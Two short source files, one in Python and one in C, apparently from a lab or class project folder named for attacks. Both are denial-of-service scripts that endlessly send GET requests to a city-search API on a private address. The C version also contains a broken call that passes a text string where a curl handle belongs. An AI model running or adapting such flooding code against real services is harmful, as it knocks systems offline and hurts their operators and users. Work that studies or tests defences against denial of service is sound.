File: ATTAQUES/python/dos.py
import requests

BASE_URL = "http://10.10.43.209:5678"
API_VERSION = "0.08"

url = BASE_URL + '/' + API_VERSION + '/index.php/villes?name=' + "sai"
url1 = BASE_URL + '/' + API_VERSION + '/index.php/villes?name=' + "bre"
url2 = BASE_URL + '/' + API_VERSION + '/index.php/villes?name=' + "par"
url3 = BASE_URL + '/' + API_VERSION + '/index.php/villes?name=' + "fer"
url4 = BASE_URL + '/' + API_VERSION + '/index.php/villes?name=' + "dou"
url5 = BASE_URL + '/' + API_VERSION + '/index.php/villes?name=' + "dir"

while True :
        response = requests.get(url)
        response = requests.get(url1)
        response = requests.get(url2)
        response = requests.get(url3)
        response = requests.get(url4)
        response = requests.get(url5)


# print(response.text)

File: ATTAQUES/c/dos.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>

#define BASE_URL "http://10.10.43.209:5678"
#define API_VERSION "0.08"
#define URL_LEN 100

int main() {
    char url[URL_LEN];

    CURL *curl;
    CURLcode res;

    curl = curl_easy_init();

    while(1) {
        snprintf(url, URL_LEN, "%s/%s/index.php/villes?name=%s", BASE_URL, API_VERSION, "sai");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        res = curl_easy_perform(curl);

        snprintf(url, URL_LEN, "%s/%s/index.php/villes?name=%s", BASE_URL, API_VERSION, "bre");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        res = curl_easy_perform(curl);

        snprintf(url, URL_LEN, "%s/%s/index.php/villes?name=%s", BASE_URL, API_VERSION, "par");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        res = curl_easy_perform(curl);

        snprintf(url, URL_LEN, "%s/%s/index.php/villes?name=%s", BASE_URL, API_VERSION, "fer");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        res = curl_easy_perform(curl);

        snprintf(url, URL_LEN, "%s/%s/index.php/villes?name=%s", BASE_URL, API_VERSION, "dou");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        res = curl_easy_perform(curl);

        snprintf(url, URL_LEN, "%s/%s/index.php/villes?name=%s", BASE_URL, API_VERSION, "dir");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        res = curl_easy_perform(curl);

        res= curl_easy_perform("Hello World");
    }

    curl_easy_cleanup(curl);
    return 0;
}